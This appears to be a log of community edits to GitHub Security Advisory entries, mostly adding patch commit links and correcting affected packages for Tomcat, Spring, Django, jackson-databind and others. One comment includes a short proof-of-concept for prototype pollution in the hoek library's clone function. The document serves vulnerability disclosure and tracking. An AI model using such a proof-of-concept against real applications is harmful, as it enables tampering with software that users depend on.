The affected package is spring-beans, not spring-core.
You can verify that the fixing commit changes code in spring-beans: https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583
=> [GHSA-hh26-6xwr-ggv7] Denial of service in Spring Framework

advisories/github-reviewed/2022/04/GHSA-g5mm-vmx4-3rg7/GHSA-g5mm-vmx4-3rg7.json
**Updates**
**Comments**
The affected package is spring-context, not spring-core.
You can verify that the fixing commit changes code in spring-context: https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea
=> [GHSA-g5mm-vmx4-3rg7] Improper handling of case sensitivity in Spring Framework

advisories/github-reviewed/2023/04/GHSA-wxqc-pxw9-g2p8/GHSA-wxqc-pxw9-g2p8.json
**Updates**
**Comments**
The affected package is spring-expression, not spring-core.
You can verify that the fixing commit changes code in spring-expression: https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e
=> [GHSA-wxqc-pxw9-g2p8] Spring Framework vulnerable to denial of service

advisories/github-reviewed/2023/12/GHSA-45x7-px36-x8w8/GHSA-45x7-px36-x8w8.json
**Updates**
**Comments**
https://github.com/paramiko/paramiko/issues/2337#issuecomment-1880185735
https://github.com/paramiko/paramiko/issues/2337#issuecomment-1887642773
=> [GHSA-45x7-px36-x8w8] Prefix Truncation Attack against ChaCha20-Poly1305 and Encrypt-then-MAC aka Terrapin

advisories/github-reviewed/2022/09/GHSA-c429-5p7v-vgjp/GHSA-c429-5p7v-vgjp.json
**Updates**
**Comments**
`@hapi/hoek` continued `hoek`.
The following PoC works on all versions of `hoek` starting 0.0.1:
```
const Hoek = require('hoek');
const a = JSON.parse('{ "__proto__": { "x": 1 } }');
console.log(a.x); // undefined
const b = Hoek.clone(a);
console.log(b.x); // should be undefined, but is 1
```
=> [GHSA-c429-5p7v-vgjp] hoek subject to prototype pollution via the clone function.

advisories/github-reviewed/2023/06/GHSA-g98v-hv3f-hcfr/GHSA-g98v-hv3f-hcfr.json
**Updates**
- Description
**Comments**
remove "\n" (not a newline character) from one of the bullet points
=> [GHSA-g98v-hv3f-hcfr] atty potential unaligned read

advisories/github-reviewed/2018/10/GHSA-xm6r-4466-mr74/GHSA-xm6r-4466-mr74.json
**Updates**
- References
**Comments**
This link is scam.
http://www.heavensec.org/?p=1703
=> [GHSA-xm6r-4466-mr74] OrientDB vulnerable to Improper Privilage Management leading to arbitrary command injection

advisories/github-reviewed/2024/02/GHSA-pmgm-h3cc-m4hj/GHSA-pmgm-h3cc-m4hj.json
**Updates**
- Description
**Comments**
https://github.com/rnmods/react-native-document-picker/releases/tag/v8.2.2
=> [GHSA-pmgm-h3cc-m4hj] React Native Document Picker Directory Traversal vulnerability

advisories/github-reviewed/2022/05/GHSA-ggx9-4728-588r/GHSA-ggx9-4728-588r.json
**Updates**
- References
**Comments**
add patch commit https://github.com/apache/tomcat/commit/3e1010b1a2f648581fac3d68afbf18f2979f6bf6.
=> [GHSA-ggx9-4728-588r] Apache Tomcat Directory Traversal vulnerability

advisories/github-reviewed/2022/05/GHSA-hjfh-7c4v-7q8h/GHSA-hjfh-7c4v-7q8h.json
**Updates**
- References
**Comments**
Add source code link and patch links related to CVE-2009-2901.
=> [GHSA-hjfh-7c4v-7q8h] Improper Authentication in Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-8wch-9gcg-v2pr/GHSA-8wch-9gcg-v2pr.json
**Updates**
- References
**Comments**
add patch commits: https://github.com/apache/tomcat/commit/3e1010b1a2f648581fac3d68afbf18f2979f6bf6
https://github.com/apache/tomcat55/commit/0299cb724ea71f304d54adfcdb950f59b01fb421
=> [GHSA-8wch-9gcg-v2pr] Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-mxf7-pv8q-294h/GHSA-mxf7-pv8q-294h.json
**Updates**
- References
**Comments**
add three patch commits:
https://github.com/apache/activemq/commit/2895197d0dad246757d8d1d9eea181cbf0543ae9
https://github.com/apache/activemq/commit/fed39c3619825bd92990cf1aa7a4e85119e00a6e
https://github.com/apache/activemq/commit/9dc43f3ffe85c9c56faee235a21f23bfceb865c8
=> [GHSA-mxf7-pv8q-294h] Cross-site scripting in Apache ActiveMQ

advisories/github-reviewed/2022/05/GHSA-8h2q-qm9x-55jc/GHSA-8h2q-qm9x-55jc.json
**Updates**
- References
**Comments**
add patch commits:
https://github.com/apache/tomcat55/commit/0314fe7743cb72e469cb395ccaaf2793a2ea0355
https://github.com/apache/tomcat55/commit/b05497eff4311a9657de6dfc53511d0309eb9db4
https://github.com/apache/tomcat55/commit/7a1cfb6bd2f849806e7c060dda8648409ad8714e
The commit msg and the links within them shows the fix purpose.
=> [GHSA-8h2q-qm9x-55jc] Denial of Service in Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-9737-qmgc-hfr9/GHSA-9737-qmgc-hfr9.json
**Updates**
- References
**Comments**
add patch commit https://github.com/apache/tomcat/commit/6b61911f94d6d8d49ee933c5f1882a7e7c336d2c, the commit msg shows it.
=> [GHSA-9737-qmgc-hfr9] Directory Traversal in Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-fj6c-prgj-gr3r/GHSA-fj6c-prgj-gr3r.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2010-3718.
=> [GHSA-fj6c-prgj-gr3r] Improper Limitation of a Pathname to a Restricted Directory in Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-3p86-xgrq-m6p6/GHSA-3p86-xgrq-m6p6.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2011-0013.
=> [GHSA-3p86-xgrq-m6p6] Improper Neutralization of Input During Web Page Generation in Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-q9xf-jwr4-v445/GHSA-q9xf-jwr4-v445.json
**Updates**
- References
**Comments**
Add source code link and patch links related to CVE-2011-1184.
=> [GHSA-q9xf-jwr4-v445] Authentication Bypass in Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-3xpj-jgv5-q4vv/GHSA-3xpj-jgv5-q4vv.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2011-1582.
=> [GHSA-3xpj-jgv5-q4vv] Access restriction bypass in Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-c57p-3v2g-w9rg/GHSA-c57p-3v2g-w9rg.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2011-2204.
=> [GHSA-c57p-3v2g-w9rg] Insertion of Sensitive Information into Log File in Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-9ggm-7897-x4mg/GHSA-9ggm-7897-x4mg.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2011-3190.
=> [GHSA-9ggm-7897-x4mg] Improper Input Validation in Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-4f7h-9j2x-cmr4/GHSA-4f7h-9j2x-cmr4.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2011-5062.
=> [GHSA-4f7h-9j2x-cmr4] Improper Authentication in Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-hffm-fqv4-w27r/GHSA-hffm-fqv4-w27r.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2011-5063.
=> [GHSA-hffm-fqv4-w27r] Improper Authentication in Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-6fxm-66hq-fc96/GHSA-6fxm-66hq-fc96.json
**Updates**
- References
**Comments**
add patch commits:
https://github.com/apache/commons-compress/commit/8f702469cbf4c451b6dea349290bc4af0f6f76c7
https://github.com/apache/commons-compress/commit/0600296ab8f8a0bbdfedd483f51b38005eb8e34e
https://github.com/apache/commons-compress/commit/fdd7459bc5470e90024dbe762249166481cce769
https://github.com/apache/commons-compress/commit/6e95697e783767f3549f00d7d2e1b002eac4a3d4
=> [GHSA-6fxm-66hq-fc96] Uncontrolled Resource Consumption in Apache Commons Compress

advisories/github-reviewed/2022/05/GHSA-87w9-x2c3-hrjj/GHSA-87w9-x2c3-hrjj.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2013-4590
=> [GHSA-87w9-x2c3-hrjj] Exposure of Sensitive Information to an Unauthorized Actor in Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-wf5v-jhxj-q632/GHSA-wf5v-jhxj-q632.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2014-0095.
=> [GHSA-wf5v-jhxj-q632] Denial of service in Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-qprx-q2r7-3rx6/GHSA-qprx-q2r7-3rx6.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2014-0096.
=> [GHSA-qprx-q2r7-3rx6] Improper Input Validation in Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-jrcp-c39h-r29x/GHSA-jrcp-c39h-r29x.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2015-5346.
=> [GHSA-jrcp-c39h-r29x] Improper Neutralization of Input During Web Page Generation in Apache Tomcat

advisories/github-reviewed/2024/02/GHSA-84xv-jfrm-h4gm/GHSA-84xv-jfrm-h4gm.json
**Updates**
- CVSS
- CWEs
- Severity
- Summary
**Comments**
add affected package and ecosystem, update cvss
=> [GHSA-84xv-jfrm-h4gm] registry-supper Path Traversal vulnerability

advisories/github-reviewed/2022/05/GHSA-mv42-px54-87jw/GHSA-mv42-px54-87jw.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2016-0714.
=> [GHSA-mv42-px54-87jw] Improper Access Control in Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-wxcp-f2c8-x6xv/GHSA-wxcp-f2c8-x6xv.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2016-0762.
=> [GHSA-wxcp-f2c8-x6xv] Observable Discrepancy in Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-4v3g-g84w-hv7r/GHSA-4v3g-g84w-hv7r.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2016-5018.
=> [GHSA-4v3g-g84w-hv7r] Authentication Bypass Using an Alternate Path or Channel in Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-v646-rx6w-r3qq/GHSA-v646-rx6w-r3qq.json
**Updates**
- References
**Comments**
Add source code link and patch links related to CVE-2016-5388 which fixed in multi-branch.
=> [GHSA-v646-rx6w-r3qq] Improper Access Control in Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-2rvf-329f-p99g/GHSA-2rvf-329f-p99g.json
**Updates**
- References
**Comments**
Add source location and patch links related to CVE-2016-6794.
=> [GHSA-2rvf-329f-p99g] System Property Disclosure in Apache Tomcat

advisories/github-reviewed/2024/02/GHSA-36xr-4x2f-cfj9/GHSA-36xr-4x2f-cfj9.json
**Updates**
- CWEs
- References
**Comments**
Added CWE category, CVE POC and Camel issue tracking the fix.
=> [GHSA-36xr-4x2f-cfj9] Deserialization of Untrusted Data in Apache Camel SQL

advisories/github-reviewed/2022/05/GHSA-698c-2x4j-g9gq/GHSA-698c-2x4j-g9gq.json
**Updates**
- References
**Comments**
Add 2 patch links related to CVE-2016-6817.
=> [GHSA-698c-2x4j-g9gq] Improper Restriction of Operations within the Bounds of a Memory Buffer in Apache Tomcat

advisories/github-reviewed/2024/02/GHSA-m43p-55rf-8c2j/GHSA-m43p-55rf-8c2j.json
**Updates**
- CWEs
- References
**Comments**
Added CWE category, Added PRs related to fix and CVE POC repository
=> [GHSA-m43p-55rf-8c2j] Deserialization of Untrusted Data in Apache Camel CassandraQL

advisories/github-reviewed/2018/10/GHSA-6v52-mj5r-7j2m/GHSA-6v52-mj5r-7j2m.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2018-8037 which fixed in multi-branch.
=> [GHSA-6v52-mj5r-7j2m] Apache Tomcat Race Condition vulnerability

advisories/github-reviewed/2022/05/GHSA-w3j5-q8f2-3cqq/GHSA-w3j5-q8f2-3cqq.json
**Updates**
- References
**Comments**
Add some patch  links related to CVE-2016-8745.
=> [GHSA-w3j5-q8f2-3cqq] Concurrent Execution using Shared Resource with Improper Synchronization in Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-xjgh-84hx-56c5/GHSA-xjgh-84hx-56c5.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2017-12617.
=> [GHSA-xjgh-84hx-56c5] Unrestricted Upload of File with Dangerous Type Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-3vx3-xf6q-r5xp/GHSA-3vx3-xf6q-r5xp.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2017-5648.
=> [GHSA-3vx3-xf6q-r5xp] Exposure of Resource to Wrong Sphere in Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-9hg2-395j-83rm/GHSA-9hg2-395j-83rm.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2017-5651.
=> [GHSA-9hg2-395j-83rm] Expected Behavior Violation in Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-jmvv-524f-hj5j/GHSA-jmvv-524f-hj5j.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2017-5664.
=> [GHSA-jmvv-524f-hj5j] Improper Handling of Exceptional Conditions in Apache Tomcat

advisories/github-reviewed/2022/05/GHSA-73rx-3f9r-x949/GHSA-73rx-3f9r-x949.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2017-7674.
=> [GHSA-73rx-3f9r-x949] Insufficient Verification of Data Authenticity in Apache Tomcat

advisories/github-reviewed/2018/10/GHSA-5q99-f34m-67gc/GHSA-5q99-f34m-67gc.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2018-11784.
=> [GHSA-5q99-f34m-67gc] Apache Tomcat Open Redirect vulnerability

advisories/github-reviewed/2022/05/GHSA-q6x7-f33r-3wxx/GHSA-q6x7-f33r-3wxx.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2016-6797.
=> [GHSA-q6x7-f33r-3wxx] Incorrect Authorization in Apache Tomcat

advisories/github-reviewed/2018/10/GHSA-6rxj-58jh-436r/GHSA-6rxj-58jh-436r.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2018-1304.
=> [GHSA-6rxj-58jh-436r] Apache Tomcat unauthorized access vulnerability

advisories/github-reviewed/2022/05/GHSA-wv88-pf73-x22p/GHSA-wv88-pf73-x22p.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2011-2730.
=> [GHSA-wv88-pf73-x22p] Improper Neutralization of Directives in Dynamically Evaluated Code in Spring Framework

advisories/github-reviewed/2022/05/GHSA-rp4p-g69r-438x/GHSA-rp4p-g69r-438x.json
**Updates**
- References
**Comments**
Add patch links and source code location related to CVE-2013-4152.
=> [GHSA-rp4p-g69r-438x] Cross-Site Request Forgery in Spring Framework

advisories/github-reviewed/2022/05/GHSA-g6hf-f9cq-q7w7/GHSA-g6hf-f9cq-q7w7.json
**Updates**
- References
**Comments**
Add patch links and source code location related to CVE-2013-6429.
=> [GHSA-g6hf-f9cq-q7w7] Cross-Site Request Forgery in Spring Framework

advisories/github-reviewed/2022/05/GHSA-xjrf-8x4f-43h4/GHSA-xjrf-8x4f-43h4.json
**Updates**
**Comments**
Add source code location related to CVE-2013-6430.
=> [GHSA-xjrf-8x4f-43h4] Improper Neutralization of Input During Web Page Generation in Spring Framework

advisories/github-reviewed/2022/05/GHSA-8cmm-qj8g-fcp6/GHSA-8cmm-qj8g-fcp6.json
**Updates**
- References
**Comments**
Add patch links and source code location related to CVE-2014-0054.
=> [GHSA-8cmm-qj8g-fcp6] Cross-Site Request Forgery in Spring Framework

advisories/github-reviewed/2022/05/GHSA-j66q-qmrc-89rx/GHSA-j66q-qmrc-89rx.json
**Updates**
- Description
**Comments**
Wrong version in the description not matching the affected version in the advisory
=> [GHSA-j66q-qmrc-89rx] jsonpickle unsafe deserialization

advisories/github-reviewed/2022/05/GHSA-pxcx-cxq8-4mmw/GHSA-pxcx-cxq8-4mmw.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2014-0230.
=> [GHSA-pxcx-cxq8-4mmw] Uncontrolled Resource Consumption in Apache Tomcat

advisories/github-reviewed/2018/10/GHSA-r53v-vm87-f72c/GHSA-r53v-vm87-f72c.json
**Updates**
**Comments**
The product started in a group axis and vulnerability concerns also axis group I believe.
=> [GHSA-r53v-vm87-f72c] Moderate severity vulnerability that affects org.apache.axis:axis

advisories/github-reviewed/2024/02/GHSA-785g-282q-pwvx/GHSA-785g-282q-pwvx.json
**Updates**
**Comments**
https://github.com/cyu/rack-cors/issues/274
` bundle exec bundle-audit --update`
=> [GHSA-785g-282q-pwvx] Rack CORS Middleware has Insecure File Permissions

advisories/github-reviewed/2018/10/GHSA-qxxx-2pp7-5hmx/GHSA-qxxx-2pp7-5hmx.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2017-7525.
=> [GHSA-qxxx-2pp7-5hmx] jackson-databind is vulnerable to a deserialization flaw

advisories/github-reviewed/2019/07/GHSA-qr7j-h6gg-jmgc/GHSA-qr7j-h6gg-jmgc.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2018-11307.
=> [GHSA-qr7j-h6gg-jmgc] Deserialization of Untrusted Data in jackson-databind

advisories/github-reviewed/2019/03/GHSA-cjjf-94ff-43w7/GHSA-cjjf-94ff-43w7.json
**Updates**
- References
**Comments**
Add more patch links related to CVE-2018-12022.
=> [GHSA-cjjf-94ff-43w7] jackson-databind Deserialization of Untrusted Data vulnerability

advisories/github-reviewed/2020/06/GHSA-6wqp-v4v6-c87c/GHSA-6wqp-v4v6-c87c.json
**Updates**
- References
**Comments**
Add more patch links related to CVE-2018-12023.
=> [GHSA-6wqp-v4v6-c87c] Deserialization of Untrusted Data

advisories/github-reviewed/2018/10/GHSA-cggj-fvv3-cqwv/GHSA-cggj-fvv3-cqwv.json
**Updates**
- References
**Comments**
Add source code location and patch links related to CVE-2018-7489.
=> [GHSA-cggj-fvv3-cqwv] FasterXML jackson-databind allows unauthenticated remote code execution 

advisories/github-reviewed/2020/07/GHSA-w3f4-3q6j-rh82/GHSA-w3f4-3q6j-rh82.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2018-5968.
=> [GHSA-w3f4-3q6j-rh82] Deserialization of Untrusted Data in jackson-databind

advisories/github-reviewed/2022/05/GHSA-5p59-v5wm-77v4/GHSA-5p59-v5wm-77v4.json
**Updates**
- References
**Comments**
Add source code location and patch links related to CVE-2018-6356.
=> [GHSA-5p59-v5wm-77v4] Improper Limitation of a Pathname to a Restricted Directory in Jenkins

advisories/github-reviewed/2024/02/GHSA-9822-6m93-xqf4/GHSA-9822-6m93-xqf4.json
**Updates**
**Comments**
This is a vulnerability in rails actionpack, so affected packages should be registered in actionpack.
=> [GHSA-9822-6m93-xqf4] Rails has possible XSS Vulnerability in Action Controller

advisories/github-reviewed/2018/11/GHSA-xgc9-9w4v-h33h/GHSA-xgc9-9w4v-h33h.json
**Updates**
- References
**Comments**
Add a patch https://github.com/apache/syncope/commit/726231fbf7b817bd2a9467171dcb1c0087c75bc, of which the commit message claims `Ensuring secure XSLT processing everywhere`
Add a patch https://github.com/apache/syncope/commit/717289bc10b6f3b204cb6d14881f530174c6235, of which the commit message claims `Ensuring secure XSLT processing everywhere`
Add a patch https://github.com/apache/syncope/commit/ad31479c1c543ac7d26b8c882aa14f6c00c1fd0, of which the commit message claims `Ensuring secure XSLT processing everywhere`
=> [GHSA-xgc9-9w4v-h33h] High severity vulnerability that affects org.apache.syncope:syncope-core

advisories/github-reviewed/2022/05/GHSA-99hj-ppg3-2xwc/GHSA-99hj-ppg3-2xwc.json
**Updates**
- References
**Comments**
Add source code link and patch links related to CVE-2017-1000504.
=> [GHSA-99hj-ppg3-2xwc] Cross-Site Request Forgery in Jenkins

advisories/github-reviewed/2022/05/GHSA-r5x3-2446-hrp7/GHSA-r5x3-2446-hrp7.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2017-1000503.
=> [GHSA-r5x3-2446-hrp7] Race Condition in Jenkins

advisories/github-reviewed/2022/05/GHSA-4466-8jm4-448p/GHSA-4466-8jm4-448p.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2017-1000355.
=> [GHSA-4466-8jm4-448p] Deserialization of Untrusted Data in Jenkins

advisories/github-reviewed/2018/10/GHSA-7fm6-2qw4-g3x3/GHSA-7fm6-2qw4-g3x3.json
**Updates**
- References
**Comments**
Add a patch https://github.com/pippo-java/pippo/commit/c6b26551a82d2dd32097fcb17c13c3b830916296, of which the commit message claims `Fix 458 (#470)
Thanks! I will come with small changes after merge.`
=> [GHSA-7fm6-2qw4-g3x3] Deserialization of Untrusted Data in Pippo

advisories/github-reviewed/2022/05/GHSA-8h53-fjgg-g42g/GHSA-8h53-fjgg-g42g.json
**Updates**
- References
**Comments**
Add a patch https://github.com/AsyncHttpClient/async-http-client/commit/df6ed70e86c8fc340ed75563e016c8baa94d7e72, of which the commit message claims its intention.
=> [GHSA-8h53-fjgg-g42g] Insufficient Verification of Data Authenticity in Async Http Client

advisories/github-reviewed/2018/10/GHSA-9gcm-f4x3-8jpw/GHSA-9gcm-f4x3-8jpw.json
**Updates**
- References
**Comments**
Add source code location and patch links related to CVE-2018-11039.
=> [GHSA-9gcm-f4x3-8jpw] Spring Framework Cross Site Tracing (XST)

advisories/github-reviewed/2018/10/GHSA-f26x-pr96-vw86/GHSA-f26x-pr96-vw86.json
**Updates**
- References
**Comments**
Add source code location and patch links related to CVE-2018-11040.
=> [GHSA-f26x-pr96-vw86] Moderate severity vulnerability that affects org.springframework:spring-core

advisories/github-reviewed/2018/10/GHSA-2m8h-fgr8-2q9w/GHSA-2m8h-fgr8-2q9w.json
**Updates**
**Comments**
Add source code location.
=> [GHSA-2m8h-fgr8-2q9w] Pivotal Spring Framework Paths provided to the ResourceServlet were not properly sanitized

advisories/github-reviewed/2018/10/GHSA-8crv-49fr-2h6j/GHSA-8crv-49fr-2h6j.json
**Updates**
- References
**Comments**
Add source code link and patch link related to CVE-2016-5007.
=> [GHSA-8crv-49fr-2h6j] Spring Security and Spring Framework may not recognize certain paths that should be protected

advisories/github-reviewed/2018/10/GHSA-pgf9-h69p-pcgf/GHSA-pgf9-h69p-pcgf.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2015-5211.
=> [GHSA-pgf9-h69p-pcgf] Files or Directories Accessible to External Parties in org.springframework:spring-core

advisories/github-reviewed/2018/10/GHSA-6v7w-535j-rq5m/GHSA-6v7w-535j-rq5m.json
**Updates**
- References
**Comments**
Add source code location and true patch links related to CVE-2015-3192.
=> [GHSA-6v7w-535j-rq5m] Pivotal Spring Framework DoS Attack with XML Input

advisories/github-reviewed/2018/10/GHSA-45vg-2v73-vm62/GHSA-45vg-2v73-vm62.json
**Updates**
- References
**Comments**
Add source code location and patch links related to CVE-2015-0201.
=> [GHSA-45vg-2v73-vm62] Moderate severity vulnerability that affects org.springframework:spring-core

advisories/github-reviewed/2022/05/GHSA-hhm4-hwq6-3c6w/GHSA-hhm4-hwq6-3c6w.json
**Updates**
- References
**Comments**
Add more patch links and source code location related to CVE-2014-3625.
=> [GHSA-hhm4-hwq6-3c6w] Improper Limitation of a Pathname to a Restricted Directory in Spring Framework

advisories/github-reviewed/2022/05/GHSA-ff7p-jqjm-v66h/GHSA-ff7p-jqjm-v66h.json
**Updates**
**Comments**
Add source code location related to CVE-2014-1904.
=> [GHSA-ff7p-jqjm-v66h] Improper Neutralization of Input During Web Page Generation in Spring Framework

advisories/github-reviewed/2022/05/GHSA-rp9p-863f-9c4h/GHSA-rp9p-863f-9c4h.json
**Updates**
- References
**Comments**
Add a patch https://github.com/apache/activemq/commit/51eb87a84be88d28383ea48f6e341ffe1203c5ba, of which the commit message claims `https://issues.apache.org/jira/browse/AMQ-4115 - xss in web demos
git-svn-id: https://svn.apache.org/repos/asf/activemq/trunk@1399577 13f79535-47bb-0310-9956-ffa450edef68`
=> [GHSA-rp9p-863f-9c4h] Cross-site Scripting in Apache ActiveMQ

advisories/github-reviewed/2022/05/GHSA-f98p-9pp6-7q6c/GHSA-f98p-9pp6-7q6c.json
**Updates**
- References
**Comments**
Find one more patch link related to CVE-2008-1947.
=> [GHSA-f98p-9pp6-7q6c] Apache Tomcat Cross-site scripting (XSS) vulnerability

advisories/github-reviewed/2022/05/GHSA-vhrg-v3cv-p247/GHSA-vhrg-v3cv-p247.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2017-4995.
=> [GHSA-vhrg-v3cv-p247] Deserialization of Untrusted Data in Spring Security

advisories/github-reviewed/2018/10/GHSA-rcpf-vj53-7h2m/GHSA-rcpf-vj53-7h2m.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2018-1257.
=> [GHSA-rcpf-vj53-7h2m] Denial of Service in org.springframework:spring-core

advisories/github-reviewed/2018/10/GHSA-3rmv-2pg5-xvqj/GHSA-3rmv-2pg5-xvqj.json
**Updates**
- References
**Comments**
Add some patch links and source code location related to CVE-2018-1275.
=> [GHSA-3rmv-2pg5-xvqj] Improperly Implemented Security Check for Standard in org.springframework:spring-core

advisories/github-reviewed/2019/01/GHSA-8fg4-j562-mjrc/GHSA-8fg4-j562-mjrc.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2017-15720 which fixed in multi-branch.
=> [GHSA-8fg4-j562-mjrc] Improper Input Validation in Apache Airflow resulting in Remote Code Execution

advisories/github-reviewed/2019/04/GHSA-8p7v-2jvj-v54r/GHSA-8p7v-2jvj-v54r.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2019-0216 which fixed in multi-branch.
=> [GHSA-8p7v-2jvj-v54r] Apache Airflow vulnerable to Stored XSS

advisories/github-reviewed/2021/06/GHSA-3xxv-p78r-4fc6/GHSA-3xxv-p78r-4fc6.json
**Updates**
- References
**Comments**
Add patch link related to CVE-2021-28359.
=> [GHSA-3xxv-p78r-4fc6] Cross-site Scripting in Apache Airflow

advisories/github-reviewed/2022/02/GHSA-65xw-pcqw-hjrh/GHSA-65xw-pcqw-hjrh.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2021-45229 which fixed in multi-branch.
=> [GHSA-65xw-pcqw-hjrh] Cross site scripting in apache airflow

advisories/github-reviewed/2024/03/GHSA-p2gx-4434-pf6g/GHSA-p2gx-4434-pf6g.json
**Updates**
- Summary
**Comments**
Fixed title with a bit more specific information. Added correct range.
=> [GHSA-p2gx-4434-pf6g] Apache InLong Deserialization of Untrusted Data Vulnerability

advisories/github-reviewed/2018/10/GHSA-g8hw-794c-4j9g/GHSA-g8hw-794c-4j9g.json
**Updates**
- References
**Comments**
Add source code location and patch links related to CVE-2018-1271.
=> [GHSA-g8hw-794c-4j9g] Path Traversal in org.springframework:spring-core

advisories/github-reviewed/2022/05/GHSA-rh8q-vjgf-gf74/GHSA-rh8q-vjgf-gf74.json
**Updates**
- References
**Comments**
Add source code location and patch links related to CVE-2015-5345.
=> [GHSA-rh8q-vjgf-gf74] Improper Limitation of a Pathname to a Restricted Directory in Apache Tomcat

advisories/github-reviewed/2018/07/GHSA-8m3r-rv5g-fcpq/GHSA-8m3r-rv5g-fcpq.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2011-0697 which fixed in multi-branch.
=> [GHSA-8m3r-rv5g-fcpq] Moderate severity vulnerability that affects django

advisories/github-reviewed/2022/05/GHSA-jhjg-w2cp-5j44/GHSA-jhjg-w2cp-5j44.json
**Updates**
**Comments**
Add source code location related to CVE-2015-0221.
=> [GHSA-jhjg-w2cp-5j44] Django DoS in django.views.static.serve

advisories/github-reviewed/2019/01/GHSA-37hp-765x-j95x/GHSA-37hp-765x-j95x.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2017-7233.
=> [GHSA-37hp-765x-j95x] Django Open redirect and possible XSS attack via user-supplied numeric redirect URLs

advisories/github-reviewed/2019/01/GHSA-2f9x-5v75-3qv4/GHSA-2f9x-5v75-3qv4.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2018-7537.
=> [GHSA-2f9x-5v75-3qv4] Django Denial-of-service possibility in truncatechars_html and truncatewords_html template filters

advisories/github-reviewed/2019/06/GHSA-7rp2-fm2h-wchj/GHSA-7rp2-fm2h-wchj.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2019-12308.
=> [GHSA-7rp2-fm2h-wchj] Django Cross-site Scripting in AdminURLFieldWidget

advisories/github-reviewed/2021/03/GHSA-fr28-569j-53c4/GHSA-fr28-569j-53c4.json
**Updates**
- References
**Comments**
Add more patch links related to CVE-2020-24584.
=> [GHSA-fr28-569j-53c4] Django Incorrect Default Permissions

advisories/github-reviewed/2022/01/GHSA-53qw-q765-4fww/GHSA-53qw-q765-4fww.json
**Updates**
- References
**Comments**
Add four patch links related to CVE-2021-45115.
=> [GHSA-53qw-q765-4fww] Denial-of-service in Django

advisories/github-reviewed/2024/02/GHSA-qpxm-689r-3849/GHSA-qpxm-689r-3849.json
**Updates**
**Comments**
Setting proper lower version range for the affected component in accordance with 
https://camel.apache.org/security/CVE-2024-22371.html
Thank you!
=> [GHSA-qpxm-689r-3849] Apache Camel data exposure vulnerability

advisories/github-reviewed/2019/05/GHSA-jjpq-gp5q-8q6w/GHSA-jjpq-gp5q-8q6w.json
**Updates**
- References
**Comments**
Add some patches link related to CVE-2019-0221.
In https://tomcat.apache.org/security-7.html shows the patch.
=> [GHSA-jjpq-gp5q-8q6w] Cross-site scripting in Apache Tomcat

advisories/github-reviewed/2020/05/GHSA-344f-f5vg-2jfj/GHSA-344f-f5vg-2jfj.json
**Updates**
- References
**Comments**
Add source code location and patch links related to CVE-2020-9484 which fixed in multi-branch.
=> [GHSA-344f-f5vg-2jfj] Potential remote code execution in Apache Tomcat

advisories/github-reviewed/2022/02/GHSA-m7jv-hq7h-mq7c/GHSA-m7jv-hq7h-mq7c.json
**Updates**
- References
**Comments**
Add patch links and source code location related to CVE-2020-13935 which fixed in multi-branch.
